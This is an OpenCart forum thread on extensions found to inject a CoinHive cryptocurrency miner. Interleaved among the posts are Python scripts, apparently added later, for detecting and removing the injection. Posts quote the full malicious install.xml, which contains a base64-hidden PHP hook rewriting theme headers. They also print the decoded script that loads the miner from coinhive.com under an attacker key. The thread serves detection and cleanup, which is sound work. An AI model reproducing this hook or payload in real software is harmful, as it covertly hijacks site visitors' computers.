Post by rebeccag » Sun Feb 11, 2018 11:41 am

Whilst I suspect most of the extensions provided here are genuine, I happened to download one last week that was not. It added CoinHive malware to my store. I can't find the extension in the market anymore so it might have been deleted already. It was to add a Paralax Background to my page. CoinHive will allow a hacker to use anyone who views your page to mine cryptocurrency for them. It slows down your customers' viewing experience and will tie up their CPU mining while they have your page open.

It was difficult to find so I would like to share how I found and removed it. For me the exploits were in /catalog/controller/common/header.php and /catalog/view/theme/yourtemplate/template/common/header.twig.
Opening the page in a browser and viewing the source you can see the <script> tag just before the </head> end tag with javascript referring to a CoinHive site and function.

Searching for the text in the script tag throughout all the site files yielded little result, as I found out it is base64 encoded.
I found it by base64 encoding the script tag text from the html source of the page, selecting about the first 30ish characters and searching for that. Bingo. Don't copy all the text as it contains an id unique to the hacker.

I went back to the file I downloaded for the extension and confirmed the malicious script was included in the install.xml.

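The search described in the post above (base64-encode the script text seen in the page source, grep for its first characters) works because the injected string starts at the very beginning of the base64 literal. Base64 encodes 3-byte groups, so a substring taken from the middle of the script only produces the same characters when its offset is a multiple of three; at the other two alignments the grep silently misses. The Python below is an added example, not code from this thread or from OpenCart. It generates the three possible encodings of a plaintext needle so the grep works at any alignment, and it does the reverse as well: it finds long base64 literals in source files, decodes them (recursing into the nested atob() strings), and flags anything that decodes to script or miner markers. The payload text is the one decoded in this thread; the PHP sample is constructed here to mirror the shape of the header.php hook quoted later in the thread.

```python
"""Find base64-hidden script injections in an OpenCart (or any PHP) tree."""
import base64
import binascii
import re
from pathlib import Path

# The decoded payload from this thread; encoding it reproduces the literal the
# install.xml passes to base64_decode().
INJECTED_JS = r'''<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>'''
BLOB = base64.b64encode(INJECTED_JS.encode()).decode()

# Constructed sample: the shape of the hook the install.xml adds to header.php.
SAMPLE_PHP = f"""<?php
$modules = base64_decode('PC9oZWFkPg==');
$inherit = base64_decode('{BLOB}');
$rlayout = DIR_APPLICATION . 'view/theme/' . basename($dif) . base64_decode('L3RlbXBsYXRlL2NvbW1vbi9oZWFkZXIudHdpZw==');
""".encode()

MARKERS = (b"<script", b"coinhive", b"jsworker", b"atob(", b"eval(")
B64_LITERAL = re.compile(rb"[A-Za-z0-9+/]{32,}={0,2}")


def base64_needles(plaintext: bytes) -> list[str]:
    """Grep needles that match `plaintext` inside a base64 blob at any of the
    three possible alignments (offset mod 3 of where the text starts)."""
    needles = []
    for shift in range(3):
        enc = base64.b64encode(b"\x00" * shift + plaintext).decode().rstrip("=")
        lead = (shift * 8 + 5) // 6              # chars that encode the pad bytes
        if (shift + len(plaintext)) % 3:          # last char shares bits with what follows
            enc = enc[:-1]
        needles.append(enc[lead:])
    return needles


def contains_encoded(blob: str, plaintext: bytes) -> bool:
    """True if `plaintext` occurs anywhere in the data that `blob` encodes."""
    return any(n and n in blob for n in base64_needles(plaintext))


def decode_literals(data: bytes, depth: int = 2) -> list[tuple[bytes, bytes]]:
    """(literal, decoded) for every base64 literal that decodes to text.
    Recurses into the decoded text so nested atob() strings are found too."""
    hits = []
    for m in B64_LITERAL.finditer(data):
        lit = m.group(0)
        try:
            dec = base64.b64decode(lit, validate=True)
        except (binascii.Error, ValueError):
            continue
        printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in dec)
        if not dec or printable < 0.9 * len(dec):
            continue                               # binary, or just a long identifier
        hits.append((lit, dec))
        if depth > 1:
            hits.extend(decode_literals(dec, depth - 1))
    return hits


def flagged(data: bytes) -> list[tuple[bytes, bytes]]:
    """Only the decoded literals that contain a script/miner marker."""
    return [(l, d) for l, d in decode_literals(data)
            if any(mk in d.lower() for mk in MARKERS)]


def scan_tree(root: str, exts=(".php", ".twig", ".tpl", ".xml", ".js")) -> dict:
    """Walk a store directory (include system/storage/modification) and return
    {relative path: flagged hits}. Not exercised here; for use on a real tree."""
    root_path = Path(root)
    report = {}
    for p in root_path.rglob("*"):
        if p.is_file() and p.suffix in exts:
            hits = flagged(p.read_bytes())
            if hits:
                report[p.relative_to(root_path).as_posix()] = hits
    return report


if __name__ == "__main__":
    print("grep needles for <script>:", base64_needles(b"<script>"))
    for lit, dec in flagged(SAMPLE_PHP):
        print(lit[:24].decode(), "... ->", dec[:60])
```

Run `scan_tree("/path/to/store")` over the whole document root, including the OCMOD output directory, rather than only the catalog/ tree; the decode-and-inspect pass also catches payloads whose plaintext you have not seen yet, which a grep for a known string cannot.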

Post by IP_CAM » Sun Feb 11, 2018 1:03 pm

Well, if you make such a grave Statement, please prove it by mentioning
the Link to the Extension Page, P L E A S E. And if the Page no longer
exists, please publish Seller Information and Mod Name as well.
Ernie

My Github OC Site: https://github.com/IP-CAM
4'850 + FREE OC Extensions, on the World's largest Github OC Repository Archive Site.
My Demo Sites: http://www.opencart.li/shop --- http://www.bigmax.ch/shop



Post by Johnathan » Sun Feb 11, 2018 10:41 pm

Always a good reminder.



Post by rebeccag » Mon Feb 12, 2018 3:43 am

Ok sorry, newbie here. I was about to say I couldn't find it as it's been removed, but here is the link to the removed page https://www.opencart.com/index.php?rout ... er=CodeLab . The downloaded file was called ParalaxBackground.zip. If the admins/moderators would like me to send it please let me know where to send it. It contains versions for both V3 and V2. The xml (V3) contains this code. If you base64_decode the string it has the CoinHive code.

Code:

			<search><![CDATA[
$this->load->language('common/header');
			]]></search>
            <add position="before"><![CDATA[
		$modules = base64_decode('PC9oZWFkPg==');		
		$module = $modules;
		$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');
		$ocplace = $inherit . "\n" . $module;		
		foreach(glob(DIR_APPLICATION . 'view/theme/*', GLOB_ONLYDIR) as $dif) {
			$rlayout = DIR_APPLICATION . 'view/theme/' . basename($dif) . base64_decode('L3RlbXBsYXRlL2NvbW1vbi9oZWFkZXIudHdpZw==');
			if (strpos(file_get_contents($rlayout), 'jsworker.start') == false) {
				file_put_contents($rlayout, str_replace($module, $ocplace, file_get_contents($rlayout)));
			}
		}
            ]]></add>
Decodes to this:

Code:

<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>


Post by agatha65 » Mon Feb 12, 2018 5:23 am

This developer has 2 other extensions that were updated on Feb 4!!!
The developer CodeLab was registered on 17 Dec 2017.
I think OpenCart support has to take action on this.

Good catch, rebeccag!!!

Print Version for Product Page and Product Compare Page | Rich Snippets | Facebook Open Graph Meta Tags | Information pages in top menu | Multi-Language Banners, Sliders and Carousels

Post by IP_CAM » Mon Feb 12, 2018 2:06 pm

Well, that's the infamous Contributor, also adding some bad Code into an image,
found a few days ago. OC already removed some extensions, BUT NOT ALL, because
the LAZY IMAGE LOAD Mod contains this, also coded in BASE64:

Code:

<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
and this one in the FAST REGISTRATION VqMod:

Code:

<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
In one of the extensions, it even exists twice! I reported it to OC a few Minutes ago. :'(
Ernie
---
https://www.opencart.com/index.php?rout ... er=CodeLab
---


Post by IP_CAM » Tue Feb 20, 2018 6:44 am

Well, since OC resides in one of the Bitcoin Centers of the World,
they may have decided to use their own Software, to be of Help
in 'Virtual Mining'. It saves a lot of Money on Energy and Hardware. :laugh: :drunk:
Ernie
---
Today's Download:
Opencart2x\Parallax-Background-oc2.ocmod.zip
install.xml

Code:

PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==
still equals:

Code:

<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>


Post by FallingUp » Fri Mar 30, 2018 10:22 pm

I got the same problem from this malicious plugin developer, and this is its install.xml.

I have restored header.php, but the problem still remains. Please advise how I can completely get rid of CoinHive.

Code:

<?xml version="1.0" encoding="UTF-8"?>
<modification>
    <name>Image Lazy Load</name>
    <code>Image Lazy Load</code>
	<version>1.0</version>
	<author>CodeLab</author>
	<link>http://opencart.hu</link>
	
<!-- script -->
	<file path="catalog/view/theme/*/template/common/footer.twig">
        <operation>
			<search><![CDATA[
</body>
			]]></search>
            <add position="before"><![CDATA[
<script type="text/javascript">
$(function(){
	$("img.img-responsive").lazyload({
		effect: "fadeIn",
		effectspeed: 600,  
		threshold: 200
	});
});</script>
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/extension/module/featured.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/extension/module/bestseller.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/extension/module/latest.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/extension/module/special.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/product/category.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/product/search.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/product/special.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/module/featured.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/module/bestseller.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- head -->
	<file path="catalog/controller/common/header.php">
        <operation>
			<search><![CDATA[
$this->load->language('common/header');
			]]></search>
            <add position="before"><![CDATA[
		$modules = base64_decode('PC9oZWFkPg==');		
		$module = $modules;
		$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');
		$ocplace = $inherit . "\n" . $module;		
		foreach(glob(DIR_APPLICATION . 'view/theme/*', GLOB_ONLYDIR) as $dif) {
			$rlayout = DIR_APPLICATION . 'view/theme/' . basename($dif) . base64_decode('L3RlbXBsYXRlL2NvbW1vbi9oZWFkZXIudHdpZw==');
			if (strpos(file_get_contents($rlayout), 'jsworker.start') == false) {
				file_put_contents($rlayout, str_replace($module, $ocplace, file_get_contents($rlayout)));
			}
		}
            ]]></add>
        </operation>
	</file>
			
<!-- front -->
	<file path="catalog/view/theme/*/template/module/latest.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/module/special.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- head -->
	<file path="catalog/view/theme/*/template/common/header.twig">
        <operation>
			<search><![CDATA[
</head>
			]]></search>
            <add position="before"><![CDATA[
<script src="catalog/view/javascript/jquery/lazyload/jquery.lazyload.js" type="text/javascript"></script>
            ]]></add>
        </operation>
	</file>
	
</modification>
			

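The symptom in the post above (header.php restored, miner still served) follows directly from the header.php operation in the install.xml it quotes. That hook runs on every page load: it base64-decodes the miner script and writes it before </head> in catalog/view/theme/*/template/common/header.twig for every installed theme, skipping files that already contain jsworker.start. So the twig files stay modified after header.php is put back. If the OCMOD was applied through the Extension Installer, the modified copy of header.php written by the modification system (system/storage/modification/ in a stock OpenCart 3 install) also still carries the hook until the modification is uninstalled and Extensions > Modifications is refreshed, and OpenCart 3 compiles Twig templates into system/storage/cache/, which should be cleared afterwards so a cached copy of the injected header is not served. The Python below is an added example, not OpenCart code and not code from anyone in this thread; it assumes the stock OpenCart 3 paths, strips every <script> block whose text or decoded atob() arguments name the miner, and reports PHP files that still contain the hook so they can be restored from a clean copy. The demo() function builds a throwaway tree (a constructed sample, not a real store) to show the before/after.

```python
"""Strip the CoinHive injection from every theme's header.twig and report PHP
files that still carry the hook."""
import base64
import binascii
import re
import tempfile
from pathlib import Path

# Payload as decoded in this thread.
INJECTED_JS = r'''<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>'''

# Constructed minimal header.twig standing in for a real theme file.
CLEAN_TWIG = """<!DOCTYPE html>
<html dir="{{ direction }}" lang="{{ lang }}">
<head>
<title>{{ title }}</title>
<script src="catalog/view/javascript/common.js" type="text/javascript"></script>
</head>
<body>{{ content_top }}</body>
</html>
"""

MARKERS = ("jsworker", "coinhive")
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.S)
ATOB_ARG = re.compile(r"atob\('([A-Za-z0-9+/=]+)'\)")
PHP_HOOK = re.compile(r"base64_decode\(|jsworker")
THEME_HEADERS = "catalog/view/theme/*/template/common/header.twig"
PHP_FILES = ("catalog/controller/common/header.php",                        # assumed OpenCart 3 layout
             "system/storage/modification/catalog/controller/common/header.php")


def _looks_injected(block: str) -> bool:
    """The first injected block hides the miner URL behind atob(); decode those
    arguments so the markers are checked on what the browser would load."""
    decoded = []
    for lit in ATOB_ARG.findall(block):
        try:
            decoded.append(base64.b64decode(lit).decode("latin-1"))
        except (binascii.Error, ValueError):
            pass
    haystack = " ".join([block, *decoded]).lower()
    return any(m in haystack for m in MARKERS)


def strip_injection(text: str) -> tuple[str, int]:
    """Return (cleaned text, number of injected <script> blocks removed).
    Legitimate script tags (no marker, no miner URL) are left untouched."""
    removed = 0

    def drop(m):
        nonlocal removed
        if _looks_injected(m.group(0)):
            removed += 1
            return ""
        return m.group(0)

    return SCRIPT_BLOCK.sub(drop, text), removed


def clean_tree(root: Path, dry_run: bool = False) -> dict:
    """Clean every theme's header.twig under `root`; list PHP files that still
    contain the hook (restore those from a clean OpenCart copy, then uninstall
    the modification and refresh the modification cache)."""
    report = {"cleaned": [], "php_hooked": []}
    for twig in sorted(root.glob(THEME_HEADERS)):
        cleaned, n = strip_injection(twig.read_text(encoding="utf-8"))
        if n:
            report["cleaned"].append((twig.relative_to(root).as_posix(), n))
            if not dry_run:
                twig.write_text(cleaned, encoding="utf-8")
    for rel in PHP_FILES:
        php = root / rel
        if php.exists() and PHP_HOOK.search(php.read_text(encoding="utf-8")):
            report["php_hooked"].append(rel)
    return report


def demo() -> dict:
    """Build a throwaway store tree, infect it the way the hook does
    (str_replace of '</head>' with payload, newline, '</head>'), then clean it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for theme in ("default", "custom"):
            twig = root / "catalog/view/theme" / theme / "template/common/header.twig"
            twig.parent.mkdir(parents=True)
            twig.write_text(CLEAN_TWIG.replace("</head>", INJECTED_JS + "\n</head>"),
                            encoding="utf-8")
        hooked = root / PHP_FILES[1]
        hooked.parent.mkdir(parents=True)
        hooked.write_text("<?php\n$inherit = base64_decode('PHNjcmlwdD4=');\n", encoding="utf-8")
        before = clean_tree(root, dry_run=True)
        clean_tree(root)
        after = clean_tree(root)
        default_twig = (root / "catalog/view/theme/default/template/common/header.twig").read_text(encoding="utf-8")
    return {"before": before, "after": after, "default_twig": default_twig}


if __name__ == "__main__":
    result = demo()
    print("before:", result["before"])
    print("after: ", result["after"])
```

Run `clean_tree(Path("/path/to/store"), dry_run=True)` first and read the report; the script deliberately never edits PHP, because a header.php that still contains the hook should be replaced with the file from a clean OpenCart download of the same version, not patched in place. After the files are clean, uninstall the extension in the Extension Installer, refresh the modifications, clear the theme cache, and re-run the scan to confirm nothing is written back on the next request.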